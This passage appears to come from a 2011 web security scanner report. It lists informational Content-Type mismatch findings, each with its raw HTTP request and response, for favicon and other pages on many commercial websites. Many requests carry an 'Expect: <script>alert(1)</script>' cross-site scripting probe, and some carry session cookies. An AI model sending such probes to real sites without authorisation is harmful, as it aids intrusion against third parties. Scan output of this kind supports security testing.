Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 00:51:26 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

35.52. http://www.recon.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.recon.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.recon.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
WS: 5
Date: Sun, 01 May 2011 23:33:59 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

35.53. http://www.redirectgame.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.redirectgame.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.redirectgame.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:11:40 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

35.54. http://www.ronniesmailorder.com/fiche_select1.asp

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.ronniesmailorder.com
Path:   /fiche_select1.asp

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /fiche_select1.asp?cat=Motorcycles&mfg=Kawasaki HTTP/1.1
Host: www.ronniesmailorder.com
Proxy-Connection: keep-alive
Referer: http://www.ronnies.com/micro.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sid=08976557X5K1K2011J9I06I09JPMQ2929R0

Response

HTTP/1.1 200 OK
Cache-Control: Private
Date: Mon, 02 May 2011 02:30:09 GMT
Pragma: no-store
Content-Type: text/html
Expires: Thu, 29 Apr 1999 12:00:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 10

<!--T:0-->

35.55. http://www.ronniesmailorder.com/testimonials_display.asp

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.ronniesmailorder.com
Path:   /testimonials_display.asp

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /testimonials_display.asp HTTP/1.1
Host: www.ronniesmailorder.com
Proxy-Connection: keep-alive
Referer: http://www.ronniesmailorder.com/fiche_select1.asp?cat=Motorcycles&mfg=Kawasaki
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sid=08976557X5K1K2011J9I06I09JPMQ2929R0; __utmz=228257950.1304319978.1.1.utmcsr=ronnies.com|utmccn=(referral)|utmcmd=referral|utmcct=/micro.htm; __utma=228257950.337968248.1304319978.1304319978.1304319978.1; __utmc=228257950; __utmb=228257950.1.10.1304319978

Response

HTTP/1.1 200 OK
Cache-Control: Private
Date: Mon, 02 May 2011 02:07:08 GMT
Pragma: no-store
Content-Type: text/html
Expires: Thu, 29 Apr 1999 12:00:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 10

<!--T:0-->

35.56. http://www.rustoleum.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.rustoleum.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.rustoleum.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:30:54 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

35.57. http://www.seoq.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www.seoq.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=84ovc21s3vtovhoj4kq864i715; __utmz=98813212.1304319916.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=98813212.996978159.1304319916.1304319916.1304319916.1; __utmc=98813212; __utmb=98813212.1.10.1304319916; CAKEPHP=qrepgjnj88vg0sk4ucubrlciu3

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:33:58 GMT
Server: Apache
Last-Modified: Tue, 08 Jun 2010 00:21:00 GMT
ETag: "34a879e-3aee-48879c38c1300"
Accept-Ranges: bytes
Content-Length: 15086
Content-Type: text/plain; charset=UTF-8

......00.... ..%..6... .... ......%........ .h....6..(...0...`..... ......$..................e....p\..t_..va..va.$.v............E.......................................5...w..........................
...[SNIP]...

35.58. http://www.seoq.com/webstatshq/images/fav/a/l/b/505403_favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /webstatshq/images/fav/a/l/b/505403_favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /webstatshq/images/fav/a/l/b/505403_favicon.ico HTTP/1.1
Host: www.seoq.com
Proxy-Connection: keep-alive
Referer: http://www.seoq.com/webstatshq/www.onlinemicrofiche.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=84ovc21s3vtovhoj4kq864i715

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:21:01 GMT
Server: Apache
Last-Modified: Fri, 05 Nov 2010 09:52:08 GMT
ETag: "3520c7e-47e-4944b3a468200"
Accept-Ranges: bytes
Content-Length: 1150
Content-Type: text/plain; charset=UTF-8

............ .h.......(....... ..... ..........................................n.0.n.P?.. ?...?............................................n.`.n...n.@?...?..0?.. ......................................
...[SNIP]...

35.59. http://www.seoq.com/webstatshq/images/fav/c/h/e/159320_favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /webstatshq/images/fav/c/h/e/159320_favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /webstatshq/images/fav/c/h/e/159320_favicon.ico HTTP/1.1
Host: www.seoq.com
Proxy-Connection: keep-alive
Referer: http://www.seoq.com/webstatshq/www.onlinemicrofiche.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=84ovc21s3vtovhoj4kq864i715

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:19:54 GMT
Server: Apache
Last-Modified: Fri, 05 Nov 2010 12:39:50 GMT
ETag: "35807a2-e36-4944d92047180"
Accept-Ranges: bytes
Content-Length: 3638
Content-Type: text/plain; charset=UTF-8

..............h...&... ..............(....... ...........@................................>>>.........```. .....NNN.............ooo.....+++.444.....................www.............GGG.hhh.ZZZ...
...[SNIP]...

35.60. http://www.seoq.com/webstatshq/images/fav/def3.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /webstatshq/images/fav/def3.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /webstatshq/images/fav/def3.ico HTTP/1.1
Host: www.seoq.com
Proxy-Connection: keep-alive
Referer: http://www.seoq.com/webstatshq/www.onlinemicrofiche.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=84ovc21s3vtovhoj4kq864i715

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:21:39 GMT
Server: Apache
Last-Modified: Fri, 05 Nov 2010 14:37:34 GMT
ETag: "34f8671-47e-4944f37108780"
Accept-Ranges: bytes
Content-Length: 1150
Content-Type: text/plain; charset=UTF-8

............ .h.......(....... ..... ............................................................................................................:...n...................n...T..........................
...[SNIP]...

35.61. http://www.seoq.com/webstatshq/images/fav/def5.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /webstatshq/images/fav/def5.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /webstatshq/images/fav/def5.ico HTTP/1.1
Host: www.seoq.com
Proxy-Connection: keep-alive
Referer: http://www.seoq.com/webstatshq/www.onlinemicrofiche.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=84ovc21s3vtovhoj4kq864i715

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:24:36 GMT
Server: Apache
Last-Modified: Fri, 05 Nov 2010 14:37:53 GMT
ETag: "34f8673-47e-4944f38327240"
Accept-Ranges: bytes
Content-Length: 1150
Content-Type: text/plain; charset=UTF-8

............ .h.......(....... ..... ............................................................................................................:...n...................n...T..........................
...[SNIP]...

35.62. http://www.seoq.com/webstatshq/images/fav/def6.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /webstatshq/images/fav/def6.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /webstatshq/images/fav/def6.ico HTTP/1.1
Host: www.seoq.com
Proxy-Connection: keep-alive
Referer: http://www.seoq.com/webstatshq/www.onlinemicrofiche.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=84ovc21s3vtovhoj4kq864i715

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:20:20 GMT
Server: Apache
Last-Modified: Fri, 05 Nov 2010 14:37:53 GMT
ETag: "34f8674-47e-4944f38327240"
Accept-Ranges: bytes
Content-Length: 1150
Content-Type: text/plain; charset=UTF-8

............ .h.......(....... ..... ............................................................................................................:...n...................n...T..........................
...[SNIP]...

35.63. http://www.seoq.com/webstatshq/images/fav/e/b/a/22_favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /webstatshq/images/fav/e/b/a/22_favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /webstatshq/images/fav/e/b/a/22_favicon.ico HTTP/1.1
Host: www.seoq.com
Proxy-Connection: keep-alive
Referer: http://www.seoq.com/webstatshq/www.onlinemicrofiche.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=84ovc21s3vtovhoj4kq864i715

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:21:07 GMT
Server: Apache
Last-Modified: Fri, 05 Nov 2010 14:44:43 GMT
ETag: "35c8f3c-57e-4944f50a28cc0"
Accept-Ranges: bytes
Content-Length: 1406
Content-Type: text/plain; charset=UTF-8

..............h.......(....... ...................................3...3...ff......3f.......f..33..3...3.f..ff..3f...3..f3..f3.f.3.......................................................................
...[SNIP]...

35.64. http://www.seoq.com/webstatshq/images/fav/g/o/o/19_favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /webstatshq/images/fav/g/o/o/19_favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /webstatshq/images/fav/g/o/o/19_favicon.ico HTTP/1.1
Host: www.seoq.com
Proxy-Connection: keep-alive
Referer: http://www.seoq.com/webstatshq/www.onlinemicrofiche.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=84ovc21s3vtovhoj4kq864i715

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:24:14 GMT
Server: Apache
Last-Modified: Fri, 05 Nov 2010 17:03:02 GMT
ETag: "3610325-47e-494513f4b3d80"
Accept-Ranges: bytes
Content-Length: 1150
Content-Type: text/plain; charset=UTF-8

............ .h.......(....... ..... .................................|...O...E...M...............Ix..4z..?|..@|..<{..Az.........._.......................|...........1v..;...?...>}..>z..Cy............
...[SNIP]...

35.65. http://www.seoq.com/webstatshq/images/fav/g/o/o/1_favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /webstatshq/images/fav/g/o/o/1_favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /webstatshq/images/fav/g/o/o/1_favicon.ico HTTP/1.1
Host: www.seoq.com
Proxy-Connection: keep-alive
Referer: http://www.seoq.com/webstatshq/www.onlinemicrofiche.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=84ovc21s3vtovhoj4kq864i715

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:23:51 GMT
Server: Apache
Last-Modified: Fri, 05 Nov 2010 17:03:03 GMT
ETag: "3610326-47e-494513f5a7fc0"
Accept-Ranges: bytes
Content-Length: 1150
Content-Type: text/plain; charset=UTF-8

............ .h.......(....... ..... .................................|...O...E...M...............Ix..4z..?|..@|..<{..Az.........._.......................|...........1v..;...?...>}..>z..Cy............
...[SNIP]...

35.66. http://www.seoq.com/webstatshq/images/fav/r/i/v/647810_favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /webstatshq/images/fav/r/i/v/647810_favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /webstatshq/images/fav/r/i/v/647810_favicon.ico HTTP/1.1
Host: www.seoq.com
Proxy-Connection: keep-alive
Referer: http://www.seoq.com/webstatshq/www.onlinemicrofiche.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=84ovc21s3vtovhoj4kq864i715

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:21:39 GMT
Server: Apache
Last-Modified: Sat, 06 Nov 2010 01:17:12 GMT
ETag: "3708812-1cbe-4945826925600"
Accept-Ranges: bytes
Content-Length: 7358
Content-Type: text/plain; charset=UTF-8

......00..............(...0...`.........................................................................................................................................................................
...[SNIP]...

35.67. http://www.seoq.com/webstatshq/images/fav/s/p/e/648999_favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /webstatshq/images/fav/s/p/e/648999_favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /webstatshq/images/fav/s/p/e/648999_favicon.ico HTTP/1.1
Host: www.seoq.com
Proxy-Connection: keep-alive
Referer: http://www.seoq.com/webstatshq/www.onlinemicrofiche.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=84ovc21s3vtovhoj4kq864i715

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:24:50 GMT
Server: Apache
Last-Modified: Sat, 06 Nov 2010 02:49:51 GMT
ETag: "373898b-37e-4945971e9f1c0"
Accept-Ranges: bytes
Content-Length: 894
Content-Type: text/plain; charset=UTF-8

..............h.......(....... ...............................3..3...z........................................3..3..3..3..V,..................................A..3..3..3..3..3..kF......................
...[SNIP]...

35.68. http://www.seoq.com/webstatshq/images/fav/y/a/h/3_favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /webstatshq/images/fav/y/a/h/3_favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /webstatshq/images/fav/y/a/h/3_favicon.ico HTTP/1.1
Host: www.seoq.com
Proxy-Connection: keep-alive
Referer: http://www.seoq.com/webstatshq/www.onlinemicrofiche.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=84ovc21s3vtovhoj4kq864i715

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:23:58 GMT
Server: Apache
Last-Modified: Sat, 06 Nov 2010 07:59:22 GMT
ETag: "37a898d-13e-4945dc4d4ea80"
Accept-Ranges: bytes
Content-Length: 318
Content-Type: text/plain; charset=UTF-8

..............(.......(....... ...................................n.j...v...z......".......B...R...b...|................................................Q....`
......p.3...:...DJ...    `DDM....0DD.....:.I
...[SNIP]...

35.69. http://www.snapfinger.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.snapfinger.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.snapfinger.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:55:37 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

35.70. http://www.tacklewarehouse.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.tacklewarehouse.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.tacklewarehouse.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:48:24 GMT
Server: Kerio_WebSTAR/5.4.2 (MacOS X)
Connection: Close
Accept-Ranges: bytes
Last-Modified: Fri, 09 Jul 2010 16:15:49 GMT
Content-Length: 82726
Content-Type: text/html

............ .h...F... .... .........00.... ..%..V......... .(....:..(....... ..... ...................................................................................................................
...[SNIP]...

35.71. http://www.tenniswarehouse.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.tenniswarehouse.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.tenniswarehouse.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:39:18 GMT
Server: Kerio_WebSTAR/5.4.2 (MacOS X)
Connection: Close
Accept-Ranges: bytes
Last-Modified: Wed, 02 Mar 2005 01:31:45 GMT
Content-Length: 1406
Content-Type: text/html

..............h.......(....... ...........@............................nL......................H*......de.......{..........0.......Y-..............{u..TC......C........|..h?.......h..{Z.......... ....
...[SNIP]...

35.72. http://www.termite.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.termite.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.termite.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:03:47 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

35.73. http://www.trafficspaces.net/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.trafficspaces.net
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html;charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.trafficspaces.net
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=BF8A112B9F95B5CC3B2540868CFE0F67; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 02 May 2011 00:53:40 GMT
Content-Length: 599

<!--TRAFFICSPACES_ERROR-->
<div class="content" style="margin-top: 20px">
   <div class="pagenotice">
       <!--<div id="rdcr">--><b class="rdcrtop"><b class="rdcr1"></b><b class="rdcr2"></b><b class="rd
...[SNIP]...

35.74. http://www.tubespecials.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.tubespecials.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.tubespecials.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 00:00:17 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

35.75. http://www.wheelfire.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.wheelfire.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.wheelfire.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:35:05 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

35.76. http://www.wyeke.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.wyeke.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.wyeke.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 00:19:57 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

35.77. http://www.yoplait.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.yoplait.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.yoplait.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
Date: Mon, 02 May 2011 00:33:03 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

36. Content type is not specified
There are 8 instances of this issue:


36.1. http://ad.yieldmanager.com/st

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /st

Request

GET /st?_PVID=BZVHFWKIRliKRmeZTatPkQC2rcHW80297a8AAiBt&ad_type=iframe&ad_size=300x250&site=140477&section_code=14445110&cb=1304292783315180&yud=zip%3D05672%26ycg%3D%26yyob%3D&pub_redirect_unencoded=1&pub_redirect=http://global.ard.yahoo.com/SIG=15ps83od6/M=787833.14445110.14291877.12665044/D=news/S=96654906:LREC2/Y=YAHOO/EXP=1304299983/L=BZVHFWKIRliKRmeZTatPkQC2rcHW80297a8AAiBt/B=Hqq_KEwNPVs-/J=1304292783315180/K=mbmuBMnyuFXFamzNMr12dQ/A=6261233/R=0/* HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://news.yahoo.com/s/prweb/20110427/bs_prweb/prweb5276794
